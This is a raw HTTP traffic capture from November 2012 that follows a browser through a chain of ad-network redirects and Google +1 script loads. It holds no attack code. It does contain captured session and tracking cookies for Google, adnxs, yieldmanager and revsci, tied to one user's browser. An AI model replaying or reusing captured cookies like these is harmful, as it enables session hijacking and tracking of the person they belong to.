Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 18 Nov 2012 01:30:48 GMT
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
GET /adscores/g.pixel?sid=9201788458 HTTP/1.1

Host: adadvisor.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Date: Sun,  18 Nov 2012 01:30:48 GMT
Connection: close
Server: AAWebServer
P3P: policyref=&quot;http://www.adadvisor.net/w3c/p3p.xml&quot;,CP=&quot;NOI NID&quot;
Content-Length: 0
Location: http://connexity.net/c/cse?a=L&amp;A=7c&amp;I0k=segment&amp;I0v=000&amp;I1k=zip&amp;I1v=&amp;I2k=yob&amp;I2v=&amp;I3k=gender&amp;I3v=&amp;I4k=yob2&amp;I4v=&amp;I5k=gender2&amp;I5v=
GET /00/72/26/adserv_2672.js?ad_size=160x600&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html%2CB%253D1%2526Z%253D160x600%2526_salt%253D1916686269%2526anmember%253D514%2526anprice%253D50%2526r%253D0%2526s%253D653070%2C92f3c750-311f-11e2-a7f3-ebbbc404545f%2C1353202245373&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.25573602564739906 HTTP/1.1

Host: uat-net.technoratimedia.com
GET /00/72/26/adserv_2672.js?ad_size=160x600&amp;referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html%2CB%253D1%2526Z%253D160x600%2526_salt%253D1916686269%2526anmember%253D514%2526anprice%253D50%2526r%253D0%2526s%253D653070%2C92f3c750-311f-11e2-a7f3-ebbbc404545f%2C1353202245373&amp;nsafe=general&amp;reftype=adnetwork&amp;disp=iframe&amp;tmiv=1&amp;tcb=0.25573602564739906 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/ctst=1/site=782471/size=160600/u=2/bnum=85478879/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Set-Cookie: tads_uid=EAA39E271E934570A4875DED1767D57F; Expires=Fri, 17-Nov-17 01:30:48 GMT; Path=/; Domain=.technoratimedia.com
tads_uid_cd=20121117173048-0800; Expires=Fri, 17-Nov-17 01:30:48 GMT; Path=/; Domain=.technoratimedia.com
tads_zora=1|15662|1; Expires=Mon, 19-Nov-12 01:30:48 GMT; Path=/; Domain=.technoratimedia.com
tads_au=&quot;1|CAE=&quot;; Expires=Fri, 17-Nov-17 01:30:48 GMT; Path=/; Domain=.technoratimedia.com
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 3115
X-Via: CN-5000
GET /adserver/ako?rsi_random=474562717&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1 HTTP/1.1

Host: ads.revsci.net
GET /adserver/ako?rsi_random=474562717&amp;rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&amp;rsi_site=A7798C53EBE3A118D71E950376C2B010&amp;rsi_width=728&amp;rsi_height=90&amp;rsi_secure=0&amp;rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&amp;rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rsi_title=&amp;rsi_inf=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: rsiPus_AAAA=&quot;MLtPrU93sF9jJTEyMxFbC3wKxCxX/UP6270FwVZaZE++vl4MJaacZ5XQBQ2DvFVuvwpHRw6KybcU9erDO9vXlm2ekpa8sk+u+LXJBx85jeA9ISSsy0I/NsBxp/VcMO18GnXBWafgSAzHj8jR43+z91+MW9AgmZxN4g==&quot;
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;http://js.revsci.net/w3c/rsip3p.xml&quot;, CP=&quot;NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA&quot;
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ rsiPus_AAAA=&quot;MLtPrdNocF5/JjFiuHX75dLdGYidTck5zEV44HEpNQFtg6+gsw0UatkTkGq/p8vhxgZYEyPGscp6MVvj+Nuz96/ahBBbg5LxhgRYbo68tsEiUCFEAyt2ohO1oPdFb4tCJ/R2RSgAZBHGS/WxWy+Rt+aGW9AggedOkw==&quot;; Version=1; Domain=.revsci.net; Max-Age=63072000; Path=/
Location: http://adnxs.revsci.net/imp?Z=728x90&amp;s=653070&amp;r=0&amp;_salt=1015090667&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:21 GMT
GET /c/cse?a=L&A=7c&I0k=segment&I0v=000&I1k=zip&I1v=&I2k=yob&I2v=&I3k=gender&I3v=&I4k=yob2&I4v=&I5k=gender2&I5v= HTTP/1.1

Host: connexity.net
GET /c/cse?a=L&amp;A=7c&amp;I0k=segment&amp;I0v=000&amp;I1k=zip&amp;I1v=&amp;I2k=yob&amp;I2v=&amp;I3k=gender&amp;I3v=&amp;I4k=yob2&amp;I4v=&amp;I5k=gender2&amp;I5v= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Connexity
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: extdata=7c; expires=Mon, 18-Mar-2013 01:30:48 GMT; domain=.connexity.net; path=/
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;CAO PSA OUR CURa DEVa PSDo PSAo BUS COR UNI COM&quot;,an.pp=&quot;http://www.connexity.com/privacy&quot;,an.oo=&quot;http://www.connexity.com/privacy&quot;,an.bt=&quot;N&quot;
Date: Sun, 18 Nov 2012 01:30:48 GMT
Cache-Control: no-store, max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Transfer-Encoding: binary
GET /_/apps-static/_/js/gapi/googleapis_client,iframes_styles_bubble_internal/rt=j/ver=ZmauHrJi-hM.no./sv=1/am=!lVF6vhgpQzaIV3w7gg/d=1/rs=AItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ/cb=gapi.loaded_0 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-1593465469&quot;
Expires: Mon, 17 Dec 2012 00:05:05 GMT
Date: Sat, 17 Nov 2012 00:05:05 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 32450
Age: 91543
GET /swfobject.js HTTP/1.1

Host: s.cxt.ms

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Content-Length: 4311
Connection: keep-alive
Server: nginx
Date: Sun, 18 Nov 2012 00:48:53 GMT
Expires: Mon, 19 Nov 2012 00:48:53 GMT
Cache-Control: max-age=86400
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 2515
X-Amz-Cf-Id: WeEb7Av0F2M-3-qK1OgaUhvqX_OIgteXUfKSLWs4H3pXEwz4-Q65XA==
Via: 1.0 c1639d907cade557ebff29e5be78b0b6.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /imp?Z=728x90&s=653070&r=0&_salt=1015090667&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

Host: adnxs.revsci.net
GET /imp?Z=728x90&amp;s=653070&amp;r=0&amp;_salt=1015090667&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: rsiPus_AAAA=&quot;MLtPrdNocF5/JjFiuHX75dLdGYidTck5zEV44HEpNQFtg6+gsw0UatkTkGq/p8vhxgZYEyPGscp6MVvj+Nuz96/ahBBbg5LxhgRYbo68tsEiUCFEAyt2ohO1oPdFb4tCJ/R2RSgAZBHGS/WxWy+Rt+aGW9AggedOkw==&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Sun, 18 Nov 2012 01:30:48 GMT
Content-Length: 712
GET /_/apps-static/_/js/plusone/p1b,p1p/rt=j/ver=caRqiSlpze8.en_US./sv=1/am=!So38XEcoO7WFfKjFAQ/d=1/rs=AItRSTO-I16dRXIwwS1OhkcmKAvmKhYsgw/cb=gapi.loaded_1 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;1818069199&quot;
Expires: Sun, 16 Dec 2012 21:42:48 GMT
Date: Fri, 16 Nov 2012 21:42:48 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 21270
Age: 100080
GET /ptj?member=514&size=728x90&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D653070%26r%3D0%26_salt%3D1015090667%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=514&amp;size=728x90&amp;referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&amp;inv_code=653070&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D653070%26r%3D0%26_salt%3D1015090667%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; sess=1; icu=ChII64YEEAoYAiACKAIwxPSghQUKEgjTzAgQChgBIAEoATDG9KCFBRDG9KCFBRgC; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:49 GMT; domain=.adnxs.com; HttpOnly icu=ChII64YEEAoYAyADKAMwyfSghQUKEgjTzAgQChgBIAEoATDG9KCFBRDJ9KCFBRgD; path=/; expires=Sat, 16-Feb-2013 01:30:49 GMT; domain=.adnxs.com; HttpOnly acb376282=![nC'kI/7Z_RG40Qz[m]Ok_22?enc=AQAAAAAA_D_NzMzMzMz3PwAAAMDMzABAzczMzMzM9z8AAAAAAAD8Pxdw-m4mBc0coArzhH1cTlFJOqhQAAAAAKyWCAACAgAA1gEAAAIAAADkJTwA51gBAAAAAQBVU0QAVVNEANgCWgAvmQAAGjsBAgUCAQUAAIIAjSImIwAAAAA.&amp;tt_code=653070&amp;cnd=%21NB4FtwiTsCcQ5MvwARgAIOexBTAAOK-yBkAASNYDUKytIlgBYNgGaABwGngAgAGGAYgBAJABAZgBAaABAagBArABALkBAAAAAAAA_D_BAQAAAAAAAPw_yQF97iwa0GS7P9kBAAAAAAAA8D_gAQA.&amp;udj=uf%28%27a%27%2C+1317%2C+1353202249%29%3Buf%28%27c%27%2C+645139%2C+1353202249%29%3Buf%28%27r%27%2C+3941860%2C+1353202249%29%3Bppv%281339%2C+%272075320665916469271%27%2C+1353202249%2C+1353807049%2C+645139%2C+88295%2C+0%2C+0%2C+1209600%29%3Bppv%2848189%2C+%272075320665916469271%27%2C+1353202249%2C+1353807049%2C+645139%2C+88295%2C+0%2C+0%2C+10368000%29%3B&amp;ccd=%21-AW9MwiTsCcQ5MvwARjnsQUgAA..&amp;vpid=124&amp;creative_click=http%3A%2F%2Fwww.dnafootwear.com%2Fseychelles%3Fsec%3Dwomen%3Futm_source%3DVISISEEK%26utm_medium%3DVISISEEK-RTB-Display%26utm_campaign%3DVISISEEK-Remarketing&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Mon, 19-Nov-2012 01:30:49 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FSmKI[iYaGkPx%UzCSL(do&lt;3%OgI&lt;955fX]&gt;5y9nKjMD7(K$B#at`&lt;; path=/; expires=Sat, 16-Feb-2013 01:30:49 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 18 Nov 2012 01:30:49 GMT
Content-Length: 578
GET /lso.swf HTTP/1.1

Host: t.cxt.ms

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx
Date: Sun, 18 Nov 2012 01:30:49 GMT
Content-Length: 1405
Connection: keep-alive
Expires: Mon, 19 Nov 2012 01:30:49 GMT
Cache-Control: max-age=86400
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Accept-Ranges: bytes
GET /imp?anmember=514&anprice=140&Z=728x90&s=653070&r=0&_salt=1015090667&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=140&amp;Z=728x90&amp;s=653070&amp;r=0&amp;_salt=1015090667&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: testbounce=testing; BX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322; uid=uid=92eeb846-311f-11e2-9d59-57072c508a64&amp;_hmacv=1&amp;_salt=2599266553&amp;_keyid=k1&amp;_hmac=0787c7ef74949d47565796432b69ddf9ee7dc8a9; RMBX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:49 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0480.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:49 GMT
Expires: Sun, 18 Nov 2012 01:30:49 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /iframe3?bV5bEg73CQA77oEAAAAAAPX-IAAAAAAAAgAAAAYAAAAAAP8AAAABA3hSEwAAAAAAm2QrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqhT3OyR7xDJK195hRdfly8dHG-p899Mi2NOC2AAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F15c83429-2270-477c-9adf-69374f516793lijit_leader..html,Z%3D728x90%26_salt%3D1015090667%26anmember%3D514%26anprice%3D140%26r%3D0%26s%3D653070,95510210-311f-11e2-ab35-13ecb67a31a5,1353202249339 HTTP/1.1

Host: ad.yieldmanager.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
